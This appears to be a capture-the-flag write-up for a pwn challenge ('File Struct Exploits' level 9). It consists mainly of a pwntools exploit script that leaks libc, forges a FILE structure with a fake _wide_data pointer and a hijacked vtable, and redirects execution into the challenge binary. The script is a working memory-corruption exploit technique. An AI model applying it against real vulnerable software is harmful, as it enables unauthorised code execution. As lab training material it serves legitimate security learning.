
(File Struct Exploits) level 9

(File Struct Exploits) level 9

Information

  • category: pwn

Description

Create a fake _wide_data struct to hijack control of the virtual function table of a built-in FILE struct.

from pwn import *

# Load the challenge binary once and register it as the pwntools context binary,
# so helpers such as p64() pick up the ELF's word size / endianness.
elf = ELF("/challenge/babyfile_level9")
context.binary = elf
# Module-level process handle; exploit() reads it as a global.  Note that the
# process is spawned at import time, not inside main().
p = elf.process()

def exploit():
    """Run the single interaction with the spawned challenge process.

    Reads the hex value the challenge prints after ``libc is: ``, builds a
    pwntools ``FileStructure`` whose ``_wide_data`` and ``vtable`` fields point
    at libc-relative addresses (the fake ``_wide_data`` the write-up describes),
    sends it followed by the struct's expected address, and then hands the
    terminal to the user.

    Uses the module-level process handle ``p`` and ELF ``elf``; returns nothing.
    """
    p.recvuntil(b"libc is: ")
    # The line is parsed as hex after dropping its last byte (the newline).
    # 0x84420 is a fixed offset taken from the write-up; presumably it is
    # specific to the challenge's libc build, so this will not transfer to others.
    leak_line = p.recvline()
    libc = int(leak_line[:-1], 16) - 0x84420

    # Both values are libc-relative constants from the write-up, not computed
    # here.  ``fp_addr`` is presumably where the fake struct is expected to land
    # (its value is also appended to the payload below) - the page does not say.
    io_wfile_overflow = libc + 0x1E8DC0
    fp_addr = libc + 0x1ed6a0

    fp = FileStructure()
    # _lock and _wide_data both point at fp_addr, i.e. into the same region
    # the struct itself is expected to occupy.
    fp._lock = fp_addr
    # An address 37 bytes into the binary's `authenticate` symbol; the write-up
    # does not explain this particular offset.
    fp.chain = elf.sym['authenticate'] + 37
    fp._wide_data = fp_addr
    fp.vtable = io_wfile_overflow

    # Serialized FILE struct, then the struct's own expected address as a qword.
    p.send(bytes(fp) + p64(fp_addr))

    p.interactive()

def main():
    """Script entry point: run the single exploit stage against the process spawned at import."""
    exploit()

# Only run when executed directly; note that importing the module still spawns
# the challenge process, because `p = elf.process()` runs at module load.
if __name__ == "__main__":
    main()
This post is licensed under CC BY 4.0 by the author.